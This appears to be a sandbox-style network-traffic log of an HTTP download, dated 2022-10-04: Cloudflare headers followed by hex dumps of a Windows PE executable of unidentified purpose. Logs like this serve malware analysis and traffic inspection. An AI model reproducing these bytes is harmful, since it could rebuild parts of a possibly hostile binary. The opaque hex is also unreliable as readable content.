                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Zx9TSF6OGGEHtC%2F5GjvRAVE%2FlEfdbDeTbis0mxZxVW1pKX%2B60dhFsdRWl58UhV7cssUMyFBFNapWDJi8bko%2Fv6ur1TZZ%2FinCZy8%2Fn0CfvEy3J57dAHN9i34GMPfpLT5Ooh%2FH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b68e84a226901-FRA
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12426INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 84 46 38 63 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 1b 00 ee 0d 00 00 d2 04 00 00 00 00 00 28 91 2c 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 60 00 00 04 00 00 00 00 00 00 02 00 20 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdF8c#(,@`
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12427INData Raw: 69 37 00 00 20 29 00 00 6a 37 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: i7 )j7`h
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12428INData Raw: 74 3b a0 0a 23 00 03 95 02 4f 6d 68 8f 25 00 d3 83 bb 72 96 7a d8 aa 87 83 c6 5c 51 4b c0 28 90 22 00 97 cd a6 74 6d 83 2c 19 64 7a b1 e1 e6 3a b7 b7 a6 d1 ff 18 2c 20 16 3f 72 35 db 97 fe ff ff bf 54 6d 33 40 e1 81 f4 2d 40 f2 68 c2 21 40 0e 53 27 da bf 4b 1a 56 2a 40 3a fd 07 d8 bf d4 9d d6 d6 bf e8 24 f1 de bf ae 69 59 3d 40 40 aa 73 29 40 ec 7d 88 da bf 2d 10 08 26 40 ad 05 31 25 40 76 84 07 29 40 62 77 e2 d2 bf 4f 6e 93 22 40 6e d1 c2 d0 bf 98 a9 13 de bf dc f0 34 d6 bf ba 8b a1 4e 40 0f ac 63 c4 85 4c 71 f2 0f 08 a4 3b f5 9a a6 6a 03 9a 15 79 e9 e2 42 21 ab 65 8c 2d e8 b6 76 47 e7 17 2a fb eb aa 01 41 1b b1 45 a4 90 68 5e b5 a6 b2 f9 dc 9b 0a 93 bf d5 67 46 4d 54 1a 08 f0 b0 5c 50 0f 65 97 aa 68 60 ea 00 c1 89 b8 de a2 2d e7 d7 17 37 06 2c 1d e8 fa
                                                                                                                                                                                                                                    Data Ascii: t;#Omh%rz\QK("tm,dz:, ?r5Tm3@-@h!@S'KV*@:$iY=@@s)@}-&@1%@v)@bwOn"@n4N@cLq;jyB!e-vG*AEh^gFMT\Peh`-7,
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12429INData Raw: ec 2d e0 4b 2d 51 20 a0 79 24 99 d7 9f f2 94 57 d4 3f 88 a7 b2 dd 9f f0 c9 e5 2a c0 ea 33 9b 2e a0 37 56 95 28 40 4c a1 7f d0 ff c3 fc 44 2d 20 15 83 fc d6 df 3e 75 bf d1 1f 63 3b 02 dc 5f 8b e2 ca 2b 60 5c 32 04 28 c0 30 d7 09 3c c5 f9 26 e4 06 61 d6 8b e5 ad b9 ad 1d d0 12 a6 36 25 6f 2d 46 37 15 2b 2d 22 0f 86 59 12 2f 41 60 64 ad f3 47 0c e8 6d ce a7 3f 5a 52 39 1d 33 e3 2d 23 e2 89 aa ed 1e b2 ab 83 d2 64 1a 07 0c 52 e5 29 91 39 ed 42 82 a9 86 d2 92 b3 99 c2 d2 d6 b3 0a b0 ed 62 05 ec 8d 52 76 e3 80 01 92 cb d9 29 33 6d 70 f0 cd bf 32 b1 3c e2 65 67 4d 55 ed 30 56 09 12 58 1d 30 40 32 b1 3d 02 4d 99 43 aa 88 c8 af e7 ed fc 39 40 32 b1 3c e6 28 2e bc aa 02 1c e7 75 57 8c 86 78 ad 33 ad e7 75 87 6a 90 7a ed df dd 17 09 3b bb 61 18 cf c0 41 f6 ad 8f 8f
                                                                                                                                                                                                                                    Data Ascii: -K-Q y$W?*3.7V(@LD- >uc;_+`\2(0<&a6%o-F7+-"Y/A`dGm?ZR93-#dR)9BbRv)3mp2<egMU0VX0@2=MC9@2<(.uWx3ujz;aA
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12431INData Raw: 7b 7d 4b 88 8a f6 bf 4a 0a 9f bb 73 8a 49 20 16 2f 98 74 f4 02 6b 53 8b fd 5f 6a 5f e9 26 74 da 8f 0a 02 83 ea a4 44 10 59 77 cd 33 ed b0 ae cd 36 06 d6 5f a9 37 03 ff 41 60 ee e0 08 51 76 b9 f5 8a 93 48 dd ff 4b 35 54 c2 1b ba c3 8d 84 0b 1e 97 c6 01 0e 1e c0 7d fa fd 09 00 56 b4 ef 8b 95 3f c3 12 fa 94 bf c6 f5 7f 14 96 90 e3 64 7e 47 48 3f e6 55 1e 00 00 09 00 06 00 05 01 1a 00 04 50 03 60 02 70 01 30 9f ff 5f 00 00 00 00 00 6f 6e 31 00 3b 54 54 04 99 3c d2 2c 04 99 e8 b1 e2 ea 66 a8 03 60 e0 66 ea f9 9c 1c 99 88 6d f1 e7 66 ec 52 29 ef 66 78 21 3a 17 99 58 f2 09 10 99 a8 a1 c9 14 99 e1 fe 16 e5 66 67 e8 1b ea 66 50 5e 63 ea 66 bc 05 ad 04 99 4c c7 2f 0e 99 77 85 d3 f2 66 0c c9 be 09 99 58 c6 66 01 99 54 fd bc 05 99 9e b7 a7 bf 4a af 60 c5 9e 28 12 5c
                                                                                                                                                                                                                                    Data Ascii: {}KJsI /tkS_j_&tDYw36_7A`QvHK5T}V?d~GH?UP`p0_on1;TT<,f`fmfR)fx!:XfgfP^cfL/wfXfTJ`(\
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12432INData Raw: f1 cf b8 c1 43 0d e8 f5 57 0b 08 c0 52 5d 7e fc 47 ad c4 ef fd 7f 3a 15 29 02 e8 58 fb 2c fa 97 2a 75 6c 00 f8 15 3b d8 88 36 b1 2d c9 b4 36 0c 40 87 3f fc ff ff ff 42 2b 55 da a7 23 71 f3 17 f6 3c 92 a8 05 5e b3 bd 6b 9b ef 56 0b b4 71 e3 d3 6c af 02 06 bc 8c ad 9d 1e 59 30 98 b7 5b ee 05 bd ea 5c 50 18 4c 4e b5 45 8c dd 5b 7e 2e f8 69 53 6c 37 21 0e e8 72 78 c2 55 fa 95 87 ed 96 64 7b 42 5b 49 8e 30 9f 3c 52 fd da 20 dc 50 62 13 15 60 65 48 38 99 b8 11 c3 82 c4 d7 3f 54 de 20 c5 c7 b4 c8 3b 3c 70 fa 4f 1f 38 30 73 d2 5a c4 17 e6 74 12 c1 3f 71 f6 67 35 b8 06 cf f6 34 80 31 b6 30 cb 17 fb e8 35 33 68 39 e6 75 c9 07 86 4f 05 c3 9f 22 60 d7 d1 c7 0a 6e cc 28 70 5c 41 e8 2c 30 7d 64 ad d0 17 50 32 e5 d5 3f 37 08 90 21 b8 f8 f1 01 20 80 0f e8 c7 df 17 a5 57
                                                                                                                                                                                                                                    Data Ascii: CWR]~G:)X,*ul;6-6@?B+U#q<^kVqlY0[\PLNE[~.iSl7!rxUd{B[I0<R Pb`eH8?T ;<pO80sZt?qg541053h9uO"`n(p\A,0}dP2?7! W
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12433INData Raw: d1 e0 a5 cd 2b ed d3 15 50 31 87 dc f7 ab 3b 84 c1 a0 e2 9e 95 2d 42 8c 84 01 00 00 70 ae 17 f3 3b d0 42 35 f9 3b 6c f2 0b fb 3b 86 6c 2a 07 c4 ca 88 75 04 c4 06 14 7e fc 3b bb 8d f9 fc 3b 30 42 99 f6 3b 98 c6 75 0c c4 9e a4 53 f0 3b 63 fd 7b 0c c4 3d 27 ac 0a c4 9c c6 95 0b c4 e8 5e ab 09 c4 aa 80 8a f5 3b e6 8c d5 f6 3b 02 78 de 0e c4 d7 69 59 0e c4 b4 96 39 04 c4 6c 98 11 df bf d5 59 24 03 a3 17 4d ca b4 de 3e db 6b 6c 77 71 d3 75 52 c7 c9 cc 0c 42 80 53 d5 0d a0 da e4 eb fb 96 2d 82 30 78 59 f4 6e 85 8f 2e a7 ea b9 fc 12 1c 02 24 e6 78 4b 71 6a 1b 36 47 4b 7d 32 4b 02 ba eb 93 93 f3 6d e3 8d ad db fd fc f4 bd 34 a7 e5 f5 5f 2e b0 db 03 69 f9 0e 00 80 a6 78 7a b5 77 d1 b3 04 49 f7 7b f1 fb c1 fe 7b fc 53 0c 9a a2 c7 f3 b5 9c 4e b9 0b f0 7b 64 dc c8 c3
                                                                                                                                                                                                                                    Data Ascii: +P1;-Bp;B5;l;l*u~;;0B;uS;c{='^;;xiY9lY$M>klwquRBS-0xYn.$xKqj6GK}2Km4_.ixzwI{{SN{d
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12435INData Raw: 24 d9 9f 1a 2f 73 2e c0 80 65 0d 2a a0 8f d8 03 2c 40 8c 77 e9 d4 ff 8d 8a d2 29 20 b5 0d 6a d2 df ec 84 ff 54 64 74 14 83 b2 e3 4a 7c 7e 5d 22 ed 75 72 61 3c c6 49 02 a8 10 ea 68 9c f5 82 ee e8 ae 18 36 00 51 80 9b dd 28 63 67 ff 66 1b e9 9b 03 99 c0 45 f6 f8 66 1c 82 2e f0 66 a0 f9 3d 08 99 68 c2 0e 0f 99 88 a1 ce 0b 99 a1 be 11 fa 66 07 88 1c f5 66 b8 b6 64 f5 66 3c 45 aa 1b 99 14 bf 28 11 99 56 45 d4 ed 66 dc 39 b9 16 99 88 16 61 1e 99 1c 05 72 e6 66 74 de 41 e1 66 9c b5 81 e5 66 8d 57 52 e5 66 36 59 c7 bf ed af 64 f8 4a de 1b 29 9b 87 f3 13 99 41 8d f2 db 9e c9 2c c9 a9 2d 62 28 43 40 19 41 24 77 a4 e8 52 02 a0 f2 96 fc b6 af d0 f0 54 4e 45 66 c8 9b eb 55 27 99 13 ac 2f df 46 37 62 74 f9 54 f1 49 de 66 b7 a5 41 43 b8 3b 8a 38 99 d9 de 9c 7b 91 b5 e1
                                                                                                                                                                                                                                    Data Ascii: $/s.e*,@w) jTdtJ|~]"ura<Ih6Q(cgfEf.f=hffdf<E(VEf9arftAffWRf6YdJ)A,-b(C@A$wRTNEfU'/F7btTIfAC;8{
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12436INData Raw: f7 7c 21 0e e8 79 ff 9a 02 aa b7 20 98 93 b9 45 df a6 64 ff 7b 8b 69 78 ce 04 25 d0 c1 00 ff ff ff 0f 8e 24 d3 97 bc 49 d3 00 b2 00 6c 4b 32 28 a0 39 3f 8f ab 30 16 19 05 be 3f ff 00 00 00 00 ea c4 21 68 1b 00 e6 5c bf fa d1 da 3d c7 bc 68 ba 66 1d bc c9 10 00 94 52 f4 0c f7 06 28 5c 35 df 74 9f 2e b2 49 1f 9f 87 a1 2a 39 21 c3 22 dc f3 51 fd e3 99 0d ef 1c a3 d9 d8 5b 7c f5 65 c3 5f 25 5e 9a 1f 7f 4f c5 15 73 64 d2 c2 03 af 01 94 52 74 c1 21 34 68 9d ff 21 54 df a7 e6 d1 27 e6 54 64 fd ce 78 5f 5b b5 c1 c5 e1 bc 9e 6e d9 a7 eb 1e 9b 3f c9 67 0b f8 5a c3 f9 2f fe 97 52 3d 8d 50 df 85 5a ff 5c ef b4 80 94 8e 74 31 66 8b 74 51 a1 e0 a3 20 4a 25 1e 57 df 5f c6 f8 57 df ec 3c de 51 df d6 e8 34 23 df 22 72 4d aa 20 b9 49 7b 41 df 13 9b d9 46 df 81 d6 80 5a df
                                                                                                                                                                                                                                    Data Ascii: |!y Ed{ix%$IlK2(9?0?!h\=hfR(\5t.I*9!"Q[|e_%^OsdRt!4h!T'Tdx_[n?gZ/R=PZ\t1ftQ J%W_W<Q4#"rM I{AFZ
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12437INData Raw: ba 36 d7 25 8e 3f fc ff ff ff 30 a8 39 a5 d3 e7 9a b2 ea 4b f9 87 43 4e ca 64 13 d2 5b 99 97 67 66 53 42 06 be 01 e8 e3 69 5d 5a fa 24 b6 72 99 64 cc eb c4 46 8e be 0e a3 5d fd 4b b1 43 5f 62 fa 9c ff 6a 48 b1 7b ca 4f 15 c9 c5 d7 be b1 97 b8 43 2f a4 e5 6b 37 9b ac f6 12 ee fc 17 c8 3d 0d a7 05 99 2a 22 64 9b 17 51 9a d0 6d 8e 13 04 c8 e6 3f b7 f1 9f 52 c8 65 e3 c7 a2 ce 7e 1a 70 fc 49 5a 1e 30 75 6c 1f e2 17 58 32 57 e7 3f 37 88 22 13 b8 78 61 b3 12 80 9f 08 75 ed 17 45 8e 70 15 68 5f 98 30 ef 07 f8 d9 40 e5 9f b4 0e 92 f7 c7 64 68 89 0e 70 5a e7 ad 0a 30 db 52 e8 f6 17 66 ac a0 f3 3f a9 8e d5 07 b8 7e 77 44 06 80 89 f9 a9 31 d0 73 af 39 41 c9 4e 8c 75 c0 fc ff ff ff 8c 08 ae 39 31 ab ed ad 9d 21 46 51 98 b7 25 11 64 bd ea 45 97 79 4c 4e a4 0a ed dd 5b
                                                                                                                                                                                                                                    Data Ascii: 6%?09KCNd[gfSBi]Z$rdF]KC_bjH{OC/k7=*"dQm?Re~pIZ0ulX2W?7"xauEph_0@dhpZ0Rf?~wD1s9ANu91!FQ%dEyLN[
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12439INData Raw: af 2e 4c 52 e8 20 56 54 97 fa 83 54 a6 5c af 43 f3 5d 38 84 6b 3c 3e b1 2f ed ac a7 92 01 61 6a 93 26 7e df ac d0 b9 3c 7c bf bf 8b ce 5f 4c 8d 76 3b 5c 84 67 0b 5e ac 2e 1a b4 2e 23 56 a2 a9 3c 80 54 98 22 69 40 f3 23 16 42 68 3c 60 67 e9 ee ac 61 fe e9 1c e0 43 51 6f a2 7d b6 0e 14 2f 01 00 00 62 42 96 da bf 10 15 5e 2c c0 f8 37 20 28 a0 87 c2 2e 2e 40 88 75 c4 d6 ff 2f 08 ff 2b 20 a5 27 47 d0 df d4 89 04 d7 1f 5d 2f b9 da 5f 13 46 71 2d 60 52 1e bf 2e c0 8e 9d 5a 27 60 b0 bb 0d d0 3f a0 61 73 d4 5f 95 c4 7d d2 bf de 33 97 2a 00 a7 96 ac d7 df 8f 29 14 2c 20 c8 af 57 2b e0 c5 8f 72 24 c5 02 42 10 6b 03 86 32 77 61 80 a1 70 d4 72 b7 db 82 f7 81 dd f6 77 f4 49 f7 43 12 04 e3 52 5c 62 8b 9b 4a 61 70 28 99 90 0a 25 e8 3e 0b 8e 0e c0 f1 88 37 a5 46 61 31 5c
                                                                                                                                                                                                                                    Data Ascii: .LR VTT\C]8k<>/aj&~<|_Lv;\g^..#V<T"i@#Bh<`gaCQo}/bB^,7 (..@u/+ 'G]/_Fq-`R.Z'`?as_}3*), W+r$Bk2waprwICR\bJap(%>7Fa1\
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12440INData Raw: 47 4f 8e 9b f4 7f 70 6f 5d 0b e8 22 e9 58 f3 97 38 af 18 09 f8 cf 56 68 03 60 3b 81 ba 11 38 eb ef a1 e8 8f dd e8 85 ec cf d4 45 c0 10 e8 71 9b 88 15 c0 9e 3b f1 e9 ea 31 6d 65 81 00 3e d3 94 3f fc ff ff ff b6 98 b3 ef 63 b0 85 5c 4e 42 ed 11 cd 5b 26 b6 65 79 53 f4 af bc 1e e8 c4 f0 5f 45 fa f4 c7 70 86 64 cd aa c6 59 8e f0 7f a1 42 fd 95 d0 41 40 62 43 c5 fd 75 48 06 b2 c8 50 15 2f 5c d5 a1 b1 6f c1 41 30 a4 22 92 35 84 ac b6 33 ec e3 17 ee 44 0f b8 05 be f3 20 7b 9b ce f6 96 a4 71 93 45 d6 e3 5b 8f 20 2f 10 68 19 d8 2e 80 e7 28 1e d1 17 65 fe 1b 29 68 2f 60 5b d3 07 00 19 2b d9 9f 74 06 f9 cb c7 6c 00 e2 32 70 32 7f c6 36 30 43 52 83 ca 17 66 34 cb cf 3f 31 fe be 3b b8 0e d7 2f 3a 80 29 b6 e9 c5 17 fb 78 ec 3d 68 a9 4e ac c7 07 2e 17 dc cd 9f 7a 00 0e
                                                                                                                                                                                                                                    Data Ascii: GOpo]"X8Vh`;8Eq;1me>?c\NB[&eyS_EpdYBA@bCuHP/\oA0"53D {qE[ /h.(e)h/`[+tl2p260CRf4?1;/:)x=hN.z
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12441INData Raw: fe 98 ca ac e8 51 da 69 bf 57 e3 28 4a 4c d5 a6 dd 49 84 a7 03 b8 b9 2e f2 8c c8 36 56 9a 91 da 95 54 90 62 8f 55 f3 13 3e a4 7d 3c 38 47 0f fb ac 41 4c 21 77 6a 4d 98 5e c9 ac 9e af 1c 6a bf b9 d5 ee 49 4c d3 88 1b 4a 84 99 f5 7e ba 2e f4 c2 0e 35 56 c4 57 1c 96 54 56 8c c9 03 20 b8 e4 53 c8 fd fd 56 19 2f 01 00 00 58 8b 85 d1 1f 1e a2 d3 d5 df 87 f4 90 d2 1f 18 72 2d df 5f 2c 73 e5 28 60 e1 93 2b 2b c0 41 78 ce 22 60 03 26 99 d5 3f d5 1c e7 d1 5f e8 b9 e9 d7 bf e1 26 03 2f 00 b8 8b 38 d2 df 14 8c 80 29 20 b7 c2 c3 2e e0 a8 fc 7e 23 a0 4c 25 b6 d4 9f a9 dd 78 d7 3f d5 fe 9d de 9f 3b 38 ca 29 c0 af 94 f5 08 c5 e3 92 c6 ef e5 90 af 7d 3c 96 39 04 fb ac 3f 52 2a 77 6a 23 9e 55 c9 ac 88 11 17 6a bf 17 03 e5 49 4c 05 2e 10 4a 84 2f 5b 75 ba 2e 4a 84 05 35 56
                                                                                                                                                                                                                                    Data Ascii: QiW(JLI.6VTbU>}<8GAL!wjM^jILJ~.5VWTV SV/Xr-_,s(`++Ax"`&?_&/8) .~#L%x?;8)}<9?R*wj#UjIL.J/[u.J5V
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12443INData Raw: df b4 29 4e 29 67 c8 c1 3e a8 da 20 d7 dc ff f3 ec be c6 ff 25 75 3f d0 d2 ee f2 b7 f2 f9 b0 c7 ff ff ff ff df b2 00 28 39 c9 1b ed 3e 00 bb 7e df 50 32 3f 3a 3d 68 fe ff ff 1f 5c 04 c9 bf e0 a3 6f c7 29 45 58 c4 c3 6e b3 39 40 94 9d fe 42 b9 93 f1 8f 6a 04 77 17 f0 56 a9 e9 bf 0f f1 53 30 86 66 12 34 40 bb dc 22 b1 9c be 5e 2b 40 32 11 4f 60 f7 4b b3 60 92 a4 4c 35 40 01 00 00 e0 30 50 a3 d8 42 06 36 40 59 a6 5b 90 7e 50 ee b9 46 a6 50 ce bf 01 00 00 e0 9e 79 86 c5 6f fc 8e 74 87 00 cb bf fe ff ff df 2c e0 3c 40 fd b2 f2 17 b0 f7 95 c4 d7 ff ff ff 9f ad 65 23 00 3b bf d8 38 57 3a 21 3f 14 20 b7 23 2f 00 af 2c 93 d4 ee a7 2c fe d9 ff 9f 3f 4d f0 3b bd be 1c 35 00 7b 26 db 3c a9 9d af a7 d8 ff aa 90 31 af 31 8a e7 96 28 00 ee 25 9b 4f 41 da 2b fd ff 2d 6c
                                                                                                                                                                                                                                    Data Ascii: )N)g> %u?(9>~P2?:=h\o)EXn9@BjwVS0f4@"^+@2O`K`L5@0PB6@Y[~PFPyot,<@e#;8W:!? #/,,?M;5{&<11(%OA+-l
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12444INData Raw: b7 ca 03 b0 fa c8 72 6d dc 0b 69 e0 2d ef a0 f1 75 a7 b1 f9 39 c9 6b ba c2 6d ba e1 b9 1b b1 81 3d fb 75 4d 78 30 ed ca 4b a6 e7 f3 40 bc e4 3f 75 e2 6d 17 c6 cc 88 52 e6 60 36 fe ac 2f 8b 23 92 70 a6 9a 23 9b 71 3c 25 53 ad 10 76 07 92 78 22 5b 74 2d 82 2d 99 45 4b de 3b 35 77 ac 7b 65 18 61 bc 0d f1 49 77 74 0a 7a 11 7c 15 68 7c 96 32 b6 fd aa a6 91 1a 83 f4 c4 fb 24 dd ca 94 a4 45 0f a6 28 04 09 c8 56 03 26 61 d6 68 7d d6 68 8d bc 76 dd 09 35 7b f1 f2 ec 82 5c e4 bd f7 49 16 9f 88 bc 4f 2c fe ca 44 aa 5b 16 74 71 ac 25 7c bb 6c 06 db 88 22 20 b4 a3 7d 32 c9 a7 8e 85 df 03 80 ce ca f6 7d 12 16 7f 43 37 e7 ca f2 3c 2f 80 f1 82 8d 6e 49 a2 bb ed df 96 fd f9 74 ed 15 87 78 cc fb 54 70 fe 89 a0 cf 30 43 8e de 88 e8 56 1f cc 93 eb 96 41 52 6b 61 21 59 68 6e
                                                                                                                                                                                                                                    Data Ascii: rmi-u9km=uMx0K@?umR`6/#p#q<%Svx"[t--EK;5w{eaIwtz|h|2$E(V&ah}hv5{\IO,D[tq%|l" }2}C7</nItxTp0CVARka!Yhn
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12445INData Raw: e7 cd c4 58 2b 99 b0 02 74 e1 67 83 51 ee 1e 79 4f 74 2d 8d 99 96 fe 15 14 02 c9 d7 ad 02 8d f1 00 f4 d3 be ba 6a e9 2f 3f 22 48 bc 28 f5 93 fd d8 9e b7 3e 03 91 eb e8 0c f1 dc 9c d1 ba 75 27 7a f8 57 bc 08 94 ec 07 d3 03 50 59 94 6e ee 2f 3d 4b 72 18 30 5f eb 43 ef 6a 07 61 21 bf 9a 34 cc f1 8e 53 ea fa 18 65 ea 43 03 db 53 40 23 1a 14 d0 3f 22 50 c1 f6 71 a2 01 fe b2 22 88 f5 97 d0 e7 43 a7 01 df be 31 33 e5 2f 3f 22 50 c9 4e 3d 29 71 b7 f5 27 c1 16 7c 1a d0 3f 22 50 b1 4b 0e de 2c b0 b7 4c da fd c5 a8 15 1a 0a 08 c3 e7 43 c6 a7 52 40 90 fe 10 d0 3f 22 50 d1 76 6b 66 6e 8a 1f 2d c5 2d 04 92 e4 50 3e 03 ad eb 2f 3f 22 50 d1 cf b5 45 40 00 8c 35 4f 43 4e b0 d2 29 f6 17 c0 0f e0 fd 37 5e 69 57 33 04 d7 59 00 0a e5 71 84 14 cc aa c8 39 8d 4a 1b 23 06 08 08
                                                                                                                                                                                                                                    Data Ascii: X+tgQyOt-j/?"H(>u'zWPYn/=Kr0_Cja!4SeCS@#?"Pq"C13/?"PN=)q'|?"PK,LCR@?"Pvkfn--P>/?"PE@5OCN)7^iW3Yq9J#
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12447INData Raw: 68 4b ba 93 d7 9a 05 fa 69 b8 65 fc 8a 63 20 91 3b 58 71 78 51 45 43 88 cf 77 fa 67 8c 8f c6 a7 22 70 a8 93 29 6a 75 80 2c 8b 1f 81 07 7b db cc 3f 89 38 84 a4 80 fd ff ff ff 88 fd 0c 5c 88 e7 5a 05 94 91 0d c8 b7 46 f3 92 8a fe e8 38 61 8d ec 4c d8 78 6b 2a d9 78 cc b6 a2 04 48 22 57 b0 9b db aa 66 d9 a7 d4 e0 67 36 50 68 00 fc 68 ff 8e 98 37 00 ff ff ff ff f9 12 3a fd 07 44 a1 7b 38 76 87 bf ed c7 4e 23 bf 03 41 a1 02 45 16 c9 d3 66 ab 5d 89 f3 89 c9 d7 34 ce 59 06 3f 81 51 a1 d9 58 d3 f5 41 d0 f7 44 86 4b b9 c3 3c f0 49 b9 0e ca 73 06 63 3e 91 b8 7a 37 09 84 4c 06 03 97 75 92 61 0e 6e c2 44 19 df b4 63 3c 61 ab 16 24 cb fb 3e 93 e7 46 45 51 ad 68 80 a0 d9 d7 b5 98 07 64 93 b0 55 71 f5 77 32 ce fe 0e 55 5a 03 54 e1 1d 40 2e 45 dd 1b 2e b6 7a e8 ed 1b 87
                                                                                                                                                                                                                                    Data Ascii: hKiec ;XqxQECwg"p)ju,{?8\ZF8aLxk*xH"Wfg6Phh7:D{8vN#AEf]4Y?QXADK<Isc>z7LuanDc<a$>FEQhdUqw2UZT@.E.z
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12448INData Raw: 0f 85 17 19 00 00 66 83 78 10 6e e9 62 94 01 00 c1 fe 90 a7 c0 26 8d 2f 56 10 0b 9f 8c 54 0a 78 ca 4c f3 89 64 e1 64 3c 62 5d 4a e2 ac 5b 86 64 6e 6a 77 8a 1b d0 ac 8c 8d 59 73 bf 9b 17 ab 50 4c 01 02 5e 53 84 33 6f 3b a3 2e 5e c0 4b 2c 56 d6 dd 59 8f 54 dc 1e 0c 4f f3 1f 4a 27 67 3c 5c 6b 8c e1 ac 1d 58 a2 6d 6a 49 84 dd d3 ac 82 a3 9f 70 bf a5 2c 96 18 00 14 66 c8 54 81 5e 13 eb d0 01 00 00 06 53 94 26 60 6c 1e a8 24 c0 c6 fd 4d 2d 60 d0 db 1a da 3f 36 f9 64 de 5f 6f 34 6a d8 bf 6c ab 80 20 00 77 6e bb dd df 5b e1 03 26 20 56 1f 40 21 e0 1d 41 fd 2c a0 1f 40 35 db 9f 78 28 fb d8 3f 80 8b 1e d1 9f 62 7d 49 26 c0 72 b7 37 22 a0 3f 62 39 24 40 40 b5 d3 dc ff e5 c0 e8 21 20 d9 d0 4d 11 64 5e 27 d9 91 58 83 d6 95 3b 82 26 b3 65 91 d7 a9 c3 ea e9 5f a4 d1 49
                                                                                                                                                                                                                                    Data Ascii: fxnb&/VTxLdd<b]J[dnjwYsPL^S3o;.^K,VYTOJ'g<\kXmjIp,fT^S&`l$M-`?6d_o4jl wn[& V@!A,@5x(?b}I&r7"?b9$@@! Md^'X;&e_I
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12449INData Raw: 88 dd 77 b3 89 3c f6 5f 7c 3a 35 5d d9 ec 23 36 73 55 2a 37 32 0c eb ec 24 1d 4e 48 ff 1b 4f bc 6b 0c b9 2a 49 68 c4 2b 0f 2c 98 6e 0e c8 5c 17 16 ce 5d 4e b4 14 6c 96 1b 74 b3 97 a1 69 7c 8d d4 ca 9b 2a fe ff ff fb db bd 2a dd 10 2b aa f7 23 9a a0 57 72 41 6f 67 d4 bf 7e 7a d3 db c1 9f 84 df 1f 0d 2b dd dd f2 e5 81 e3 4d f5 f0 62 d3 01 00 00 7a b9 9d fe 25 bf 3e 9a 8f dc 03 21 59 77 2f ee 6b 2d 40 01 c8 78 24 6e 05 25 06 4f cb 1d d4 bf 19 f9 28 20 6c bb 58 62 2e a8 63 9a 2c 01 00 00 80 0a ad d0 9f 3b 4b 06 22 a0 f1 9a ce d5 9f 16 62 00 d6 3f ca c1 e5 df 9f f2 ff b2 28 c0 50 b5 cc 2c a0 37 68 c2 2a 40 3c c7 28 d2 ff 05 1a 13 2f 20 31 8d ab d4 df 7e 23 e8 d3 1f 6f 25 55 de 5f 95 fc 9d 29 60 26 7c 53 2a c0 ba 87 b6 23 60 ac 99 e1 d4 3f 10 eb 9f d0 5f 01 56
                                                                                                                                                                                                                                    Data Ascii: w<_|:5]#6sU*72$NHOk*Ih+,n\]Nlti|**+#WrAog~z+Mbz%>!Yw/k-@x$n%O( lXb.c,;K"b?(P,7h*@<(/ 1~#o%U_)`&|S*#`?_V
